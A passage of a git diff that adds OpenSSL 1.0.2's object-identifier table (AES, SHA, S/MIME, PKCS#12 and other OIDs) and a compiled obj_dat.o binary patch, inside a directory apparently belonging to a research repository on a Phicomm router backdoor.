+420,	/* OBJ_aes_128_ofb128               2 16 840 1 101 3 4 1 3 */
+421,	/* OBJ_aes_128_cfb128               2 16 840 1 101 3 4 1 4 */
+788,	/* OBJ_id_aes128_wrap               2 16 840 1 101 3 4 1 5 */
+895,	/* OBJ_aes_128_gcm                  2 16 840 1 101 3 4 1 6 */
+896,	/* OBJ_aes_128_ccm                  2 16 840 1 101 3 4 1 7 */
+897,	/* OBJ_id_aes128_wrap_pad           2 16 840 1 101 3 4 1 8 */
+422,	/* OBJ_aes_192_ecb                  2 16 840 1 101 3 4 1 21 */
+423,	/* OBJ_aes_192_cbc                  2 16 840 1 101 3 4 1 22 */
+424,	/* OBJ_aes_192_ofb128               2 16 840 1 101 3 4 1 23 */
+425,	/* OBJ_aes_192_cfb128               2 16 840 1 101 3 4 1 24 */
+789,	/* OBJ_id_aes192_wrap               2 16 840 1 101 3 4 1 25 */
+898,	/* OBJ_aes_192_gcm                  2 16 840 1 101 3 4 1 26 */
+899,	/* OBJ_aes_192_ccm                  2 16 840 1 101 3 4 1 27 */
+900,	/* OBJ_id_aes192_wrap_pad           2 16 840 1 101 3 4 1 28 */
+426,	/* OBJ_aes_256_ecb                  2 16 840 1 101 3 4 1 41 */
+427,	/* OBJ_aes_256_cbc                  2 16 840 1 101 3 4 1 42 */
+428,	/* OBJ_aes_256_ofb128               2 16 840 1 101 3 4 1 43 */
+429,	/* OBJ_aes_256_cfb128               2 16 840 1 101 3 4 1 44 */
+790,	/* OBJ_id_aes256_wrap               2 16 840 1 101 3 4 1 45 */
+901,	/* OBJ_aes_256_gcm                  2 16 840 1 101 3 4 1 46 */
+902,	/* OBJ_aes_256_ccm                  2 16 840 1 101 3 4 1 47 */
+903,	/* OBJ_id_aes256_wrap_pad           2 16 840 1 101 3 4 1 48 */
+672,	/* OBJ_sha256                       2 16 840 1 101 3 4 2 1 */
+673,	/* OBJ_sha384                       2 16 840 1 101 3 4 2 2 */
+674,	/* OBJ_sha512                       2 16 840 1 101 3 4 2 3 */
+675,	/* OBJ_sha224                       2 16 840 1 101 3 4 2 4 */
+802,	/* OBJ_dsa_with_SHA224              2 16 840 1 101 3 4 3 1 */
+803,	/* OBJ_dsa_with_SHA256              2 16 840 1 101 3 4 3 2 */
+71,	/* OBJ_netscape_cert_type           2 16 840 1 113730 1 1 */
+72,	/* OBJ_netscape_base_url            2 16 840 1 113730 1 2 */
+73,	/* OBJ_netscape_revocation_url      2 16 840 1 113730 1 3 */
+74,	/* OBJ_netscape_ca_revocation_url   2 16 840 1 113730 1 4 */
+75,	/* OBJ_netscape_renewal_url         2 16 840 1 113730 1 7 */
+76,	/* OBJ_netscape_ca_policy_url       2 16 840 1 113730 1 8 */
+77,	/* OBJ_netscape_ssl_server_name     2 16 840 1 113730 1 12 */
+78,	/* OBJ_netscape_comment             2 16 840 1 113730 1 13 */
+79,	/* OBJ_netscape_cert_sequence       2 16 840 1 113730 2 5 */
+139,	/* OBJ_ns_sgc                       2 16 840 1 113730 4 1 */
+458,	/* OBJ_userId                       0 9 2342 19200300 100 1 1 */
+459,	/* OBJ_textEncodedORAddress         0 9 2342 19200300 100 1 2 */
+460,	/* OBJ_rfc822Mailbox                0 9 2342 19200300 100 1 3 */
+461,	/* OBJ_info                         0 9 2342 19200300 100 1 4 */
+462,	/* OBJ_favouriteDrink               0 9 2342 19200300 100 1 5 */
+463,	/* OBJ_roomNumber                   0 9 2342 19200300 100 1 6 */
+464,	/* OBJ_photo                        0 9 2342 19200300 100 1 7 */
+465,	/* OBJ_userClass                    0 9 2342 19200300 100 1 8 */
+466,	/* OBJ_host                         0 9 2342 19200300 100 1 9 */
+467,	/* OBJ_manager                      0 9 2342 19200300 100 1 10 */
+468,	/* OBJ_documentIdentifier           0 9 2342 19200300 100 1 11 */
+469,	/* OBJ_documentTitle                0 9 2342 19200300 100 1 12 */
+470,	/* OBJ_documentVersion              0 9 2342 19200300 100 1 13 */
+471,	/* OBJ_documentAuthor               0 9 2342 19200300 100 1 14 */
+472,	/* OBJ_documentLocation             0 9 2342 19200300 100 1 15 */
+473,	/* OBJ_homeTelephoneNumber          0 9 2342 19200300 100 1 20 */
+474,	/* OBJ_secretary                    0 9 2342 19200300 100 1 21 */
+475,	/* OBJ_otherMailbox                 0 9 2342 19200300 100 1 22 */
+476,	/* OBJ_lastModifiedTime             0 9 2342 19200300 100 1 23 */
+477,	/* OBJ_lastModifiedBy               0 9 2342 19200300 100 1 24 */
+391,	/* OBJ_domainComponent              0 9 2342 19200300 100 1 25 */
+478,	/* OBJ_aRecord                      0 9 2342 19200300 100 1 26 */
+479,	/* OBJ_pilotAttributeType27         0 9 2342 19200300 100 1 27 */
+480,	/* OBJ_mXRecord                     0 9 2342 19200300 100 1 28 */
+481,	/* OBJ_nSRecord                     0 9 2342 19200300 100 1 29 */
+482,	/* OBJ_sOARecord                    0 9 2342 19200300 100 1 30 */
+483,	/* OBJ_cNAMERecord                  0 9 2342 19200300 100 1 31 */
+484,	/* OBJ_associatedDomain             0 9 2342 19200300 100 1 37 */
+485,	/* OBJ_associatedName               0 9 2342 19200300 100 1 38 */
+486,	/* OBJ_homePostalAddress            0 9 2342 19200300 100 1 39 */
+487,	/* OBJ_personalTitle                0 9 2342 19200300 100 1 40 */
+488,	/* OBJ_mobileTelephoneNumber        0 9 2342 19200300 100 1 41 */
+489,	/* OBJ_pagerTelephoneNumber         0 9 2342 19200300 100 1 42 */
+490,	/* OBJ_friendlyCountryName          0 9 2342 19200300 100 1 43 */
+491,	/* OBJ_organizationalStatus         0 9 2342 19200300 100 1 45 */
+492,	/* OBJ_janetMailbox                 0 9 2342 19200300 100 1 46 */
+493,	/* OBJ_mailPreferenceOption         0 9 2342 19200300 100 1 47 */
+494,	/* OBJ_buildingName                 0 9 2342 19200300 100 1 48 */
+495,	/* OBJ_dSAQuality                   0 9 2342 19200300 100 1 49 */
+496,	/* OBJ_singleLevelQuality           0 9 2342 19200300 100 1 50 */
+497,	/* OBJ_subtreeMinimumQuality        0 9 2342 19200300 100 1 51 */
+498,	/* OBJ_subtreeMaximumQuality        0 9 2342 19200300 100 1 52 */
+499,	/* OBJ_personalSignature            0 9 2342 19200300 100 1 53 */
+500,	/* OBJ_dITRedirect                  0 9 2342 19200300 100 1 54 */
+501,	/* OBJ_audio                        0 9 2342 19200300 100 1 55 */
+502,	/* OBJ_documentPublisher            0 9 2342 19200300 100 1 56 */
+442,	/* OBJ_iA5StringSyntax              0 9 2342 19200300 100 3 4 */
+443,	/* OBJ_caseIgnoreIA5StringSyntax    0 9 2342 19200300 100 3 5 */
+444,	/* OBJ_pilotObject                  0 9 2342 19200300 100 4 3 */
+445,	/* OBJ_pilotPerson                  0 9 2342 19200300 100 4 4 */
+446,	/* OBJ_account                      0 9 2342 19200300 100 4 5 */
+447,	/* OBJ_document                     0 9 2342 19200300 100 4 6 */
+448,	/* OBJ_room                         0 9 2342 19200300 100 4 7 */
+449,	/* OBJ_documentSeries               0 9 2342 19200300 100 4 9 */
+392,	/* OBJ_Domain                       0 9 2342 19200300 100 4 13 */
+450,	/* OBJ_rFC822localPart              0 9 2342 19200300 100 4 14 */
+451,	/* OBJ_dNSDomain                    0 9 2342 19200300 100 4 15 */
+452,	/* OBJ_domainRelatedObject          0 9 2342 19200300 100 4 17 */
+453,	/* OBJ_friendlyCountry              0 9 2342 19200300 100 4 18 */
+454,	/* OBJ_simpleSecurityObject         0 9 2342 19200300 100 4 19 */
+455,	/* OBJ_pilotOrganization            0 9 2342 19200300 100 4 20 */
+456,	/* OBJ_pilotDSA                     0 9 2342 19200300 100 4 21 */
+457,	/* OBJ_qualityLabelledData          0 9 2342 19200300 100 4 22 */
+189,	/* OBJ_id_smime_mod                 1 2 840 113549 1 9 16 0 */
+190,	/* OBJ_id_smime_ct                  1 2 840 113549 1 9 16 1 */
+191,	/* OBJ_id_smime_aa                  1 2 840 113549 1 9 16 2 */
+192,	/* OBJ_id_smime_alg                 1 2 840 113549 1 9 16 3 */
+193,	/* OBJ_id_smime_cd                  1 2 840 113549 1 9 16 4 */
+194,	/* OBJ_id_smime_spq                 1 2 840 113549 1 9 16 5 */
+195,	/* OBJ_id_smime_cti                 1 2 840 113549 1 9 16 6 */
+158,	/* OBJ_x509Certificate              1 2 840 113549 1 9 22 1 */
+159,	/* OBJ_sdsiCertificate              1 2 840 113549 1 9 22 2 */
+160,	/* OBJ_x509Crl                      1 2 840 113549 1 9 23 1 */
+144,	/* OBJ_pbe_WithSHA1And128BitRC4     1 2 840 113549 1 12 1 1 */
+145,	/* OBJ_pbe_WithSHA1And40BitRC4      1 2 840 113549 1 12 1 2 */
+146,	/* OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC 1 2 840 113549 1 12 1 3 */
+147,	/* OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC 1 2 840 113549 1 12 1 4 */
+148,	/* OBJ_pbe_WithSHA1And128BitRC2_CBC 1 2 840 113549 1 12 1 5 */
+149,	/* OBJ_pbe_WithSHA1And40BitRC2_CBC  1 2 840 113549 1 12 1 6 */
+171,	/* OBJ_ms_ext_req                   1 3 6 1 4 1 311 2 1 14 */
+134,	/* OBJ_ms_code_ind                  1 3 6 1 4 1 311 2 1 21 */
+135,	/* OBJ_ms_code_com                  1 3 6 1 4 1 311 2 1 22 */
+136,	/* OBJ_ms_ctl_sign                  1 3 6 1 4 1 311 10 3 1 */
+137,	/* OBJ_ms_sgc                       1 3 6 1 4 1 311 10 3 3 */
+138,	/* OBJ_ms_efs                       1 3 6 1 4 1 311 10 3 4 */
+648,	/* OBJ_ms_smartcard_login           1 3 6 1 4 1 311 20 2 2 */
+649,	/* OBJ_ms_upn                       1 3 6 1 4 1 311 20 2 3 */
+951,	/* OBJ_ct_precert_scts              1 3 6 1 4 1 11129 2 4 2 */
+952,	/* OBJ_ct_precert_poison            1 3 6 1 4 1 11129 2 4 3 */
+953,	/* OBJ_ct_precert_signer            1 3 6 1 4 1 11129 2 4 4 */
+954,	/* OBJ_ct_cert_scts                 1 3 6 1 4 1 11129 2 4 5 */
+751,	/* OBJ_camellia_128_cbc             1 2 392 200011 61 1 1 1 2 */
+752,	/* OBJ_camellia_192_cbc             1 2 392 200011 61 1 1 1 3 */
+753,	/* OBJ_camellia_256_cbc             1 2 392 200011 61 1 1 1 4 */
+907,	/* OBJ_id_camellia128_wrap          1 2 392 200011 61 1 1 3 2 */
+908,	/* OBJ_id_camellia192_wrap          1 2 392 200011 61 1 1 3 3 */
+909,	/* OBJ_id_camellia256_wrap          1 2 392 200011 61 1 1 3 4 */
+196,	/* OBJ_id_smime_mod_cms             1 2 840 113549 1 9 16 0 1 */
+197,	/* OBJ_id_smime_mod_ess             1 2 840 113549 1 9 16 0 2 */
+198,	/* OBJ_id_smime_mod_oid             1 2 840 113549 1 9 16 0 3 */
+199,	/* OBJ_id_smime_mod_msg_v3          1 2 840 113549 1 9 16 0 4 */
+200,	/* OBJ_id_smime_mod_ets_eSignature_88 1 2 840 113549 1 9 16 0 5 */
+201,	/* OBJ_id_smime_mod_ets_eSignature_97 1 2 840 113549 1 9 16 0 6 */
+202,	/* OBJ_id_smime_mod_ets_eSigPolicy_88 1 2 840 113549 1 9 16 0 7 */
+203,	/* OBJ_id_smime_mod_ets_eSigPolicy_97 1 2 840 113549 1 9 16 0 8 */
+204,	/* OBJ_id_smime_ct_receipt          1 2 840 113549 1 9 16 1 1 */
+205,	/* OBJ_id_smime_ct_authData         1 2 840 113549 1 9 16 1 2 */
+206,	/* OBJ_id_smime_ct_publishCert      1 2 840 113549 1 9 16 1 3 */
+207,	/* OBJ_id_smime_ct_TSTInfo          1 2 840 113549 1 9 16 1 4 */
+208,	/* OBJ_id_smime_ct_TDTInfo          1 2 840 113549 1 9 16 1 5 */
+209,	/* OBJ_id_smime_ct_contentInfo      1 2 840 113549 1 9 16 1 6 */
+210,	/* OBJ_id_smime_ct_DVCSRequestData  1 2 840 113549 1 9 16 1 7 */
+211,	/* OBJ_id_smime_ct_DVCSResponseData 1 2 840 113549 1 9 16 1 8 */
+786,	/* OBJ_id_smime_ct_compressedData   1 2 840 113549 1 9 16 1 9 */
+787,	/* OBJ_id_ct_asciiTextWithCRLF      1 2 840 113549 1 9 16 1 27 */
+212,	/* OBJ_id_smime_aa_receiptRequest   1 2 840 113549 1 9 16 2 1 */
+213,	/* OBJ_id_smime_aa_securityLabel    1 2 840 113549 1 9 16 2 2 */
+214,	/* OBJ_id_smime_aa_mlExpandHistory  1 2 840 113549 1 9 16 2 3 */
+215,	/* OBJ_id_smime_aa_contentHint      1 2 840 113549 1 9 16 2 4 */
+216,	/* OBJ_id_smime_aa_msgSigDigest     1 2 840 113549 1 9 16 2 5 */
+217,	/* OBJ_id_smime_aa_encapContentType 1 2 840 113549 1 9 16 2 6 */
+218,	/* OBJ_id_smime_aa_contentIdentifier 1 2 840 113549 1 9 16 2 7 */
+219,	/* OBJ_id_smime_aa_macValue         1 2 840 113549 1 9 16 2 8 */
+220,	/* OBJ_id_smime_aa_equivalentLabels 1 2 840 113549 1 9 16 2 9 */
+221,	/* OBJ_id_smime_aa_contentReference 1 2 840 113549 1 9 16 2 10 */
+222,	/* OBJ_id_smime_aa_encrypKeyPref    1 2 840 113549 1 9 16 2 11 */
+223,	/* OBJ_id_smime_aa_signingCertificate 1 2 840 113549 1 9 16 2 12 */
+224,	/* OBJ_id_smime_aa_smimeEncryptCerts 1 2 840 113549 1 9 16 2 13 */
+225,	/* OBJ_id_smime_aa_timeStampToken   1 2 840 113549 1 9 16 2 14 */
+226,	/* OBJ_id_smime_aa_ets_sigPolicyId  1 2 840 113549 1 9 16 2 15 */
+227,	/* OBJ_id_smime_aa_ets_commitmentType 1 2 840 113549 1 9 16 2 16 */
+228,	/* OBJ_id_smime_aa_ets_signerLocation 1 2 840 113549 1 9 16 2 17 */
+229,	/* OBJ_id_smime_aa_ets_signerAttr   1 2 840 113549 1 9 16 2 18 */
+230,	/* OBJ_id_smime_aa_ets_otherSigCert 1 2 840 113549 1 9 16 2 19 */
+231,	/* OBJ_id_smime_aa_ets_contentTimestamp 1 2 840 113549 1 9 16 2 20 */
+232,	/* OBJ_id_smime_aa_ets_CertificateRefs 1 2 840 113549 1 9 16 2 21 */
+233,	/* OBJ_id_smime_aa_ets_RevocationRefs 1 2 840 113549 1 9 16 2 22 */
+234,	/* OBJ_id_smime_aa_ets_certValues   1 2 840 113549 1 9 16 2 23 */
+235,	/* OBJ_id_smime_aa_ets_revocationValues 1 2 840 113549 1 9 16 2 24 */
+236,	/* OBJ_id_smime_aa_ets_escTimeStamp 1 2 840 113549 1 9 16 2 25 */
+237,	/* OBJ_id_smime_aa_ets_certCRLTimestamp 1 2 840 113549 1 9 16 2 26 */
+238,	/* OBJ_id_smime_aa_ets_archiveTimeStamp 1 2 840 113549 1 9 16 2 27 */
+239,	/* OBJ_id_smime_aa_signatureType    1 2 840 113549 1 9 16 2 28 */
+240,	/* OBJ_id_smime_aa_dvcs_dvc         1 2 840 113549 1 9 16 2 29 */
+241,	/* OBJ_id_smime_alg_ESDHwith3DES    1 2 840 113549 1 9 16 3 1 */
+242,	/* OBJ_id_smime_alg_ESDHwithRC2     1 2 840 113549 1 9 16 3 2 */
+243,	/* OBJ_id_smime_alg_3DESwrap        1 2 840 113549 1 9 16 3 3 */
+244,	/* OBJ_id_smime_alg_RC2wrap         1 2 840 113549 1 9 16 3 4 */
+245,	/* OBJ_id_smime_alg_ESDH            1 2 840 113549 1 9 16 3 5 */
+246,	/* OBJ_id_smime_alg_CMS3DESwrap     1 2 840 113549 1 9 16 3 6 */
+247,	/* OBJ_id_smime_alg_CMSRC2wrap      1 2 840 113549 1 9 16 3 7 */
+125,	/* OBJ_zlib_compression             1 2 840 113549 1 9 16 3 8 */
+893,	/* OBJ_id_alg_PWRI_KEK              1 2 840 113549 1 9 16 3 9 */
+248,	/* OBJ_id_smime_cd_ldap             1 2 840 113549 1 9 16 4 1 */
+249,	/* OBJ_id_smime_spq_ets_sqt_uri     1 2 840 113549 1 9 16 5 1 */
+250,	/* OBJ_id_smime_spq_ets_sqt_unotice 1 2 840 113549 1 9 16 5 2 */
+251,	/* OBJ_id_smime_cti_ets_proofOfOrigin 1 2 840 113549 1 9 16 6 1 */
+252,	/* OBJ_id_smime_cti_ets_proofOfReceipt 1 2 840 113549 1 9 16 6 2 */
+253,	/* OBJ_id_smime_cti_ets_proofOfDelivery 1 2 840 113549 1 9 16 6 3 */
+254,	/* OBJ_id_smime_cti_ets_proofOfSender 1 2 840 113549 1 9 16 6 4 */
+255,	/* OBJ_id_smime_cti_ets_proofOfApproval 1 2 840 113549 1 9 16 6 5 */
+256,	/* OBJ_id_smime_cti_ets_proofOfCreation 1 2 840 113549 1 9 16 6 6 */
+150,	/* OBJ_keyBag                       1 2 840 113549 1 12 10 1 1 */
+151,	/* OBJ_pkcs8ShroudedKeyBag          1 2 840 113549 1 12 10 1 2 */
+152,	/* OBJ_certBag                      1 2 840 113549 1 12 10 1 3 */
+153,	/* OBJ_crlBag                       1 2 840 113549 1 12 10 1 4 */
+154,	/* OBJ_secretBag                    1 2 840 113549 1 12 10 1 5 */
+155,	/* OBJ_safeContentsBag              1 2 840 113549 1 12 10 1 6 */
+34,	/* OBJ_idea_cbc                     1 3 6 1 4 1 188 7 1 1 2 */
+955,	/* OBJ_jurisdictionLocalityName     1 3 6 1 4 1 311 60 2 1 1 */
+956,	/* OBJ_jurisdictionStateOrProvinceName 1 3 6 1 4 1 311 60 2 1 2 */
+957,	/* OBJ_jurisdictionCountryName      1 3 6 1 4 1 311 60 2 1 3 */
+};
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.o
new file mode 100644
index 0000000000000000000000000000000000000000..3504d7e225b9a1eed66abf9944ed868d868b871f
GIT binary patch
literal 156296
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
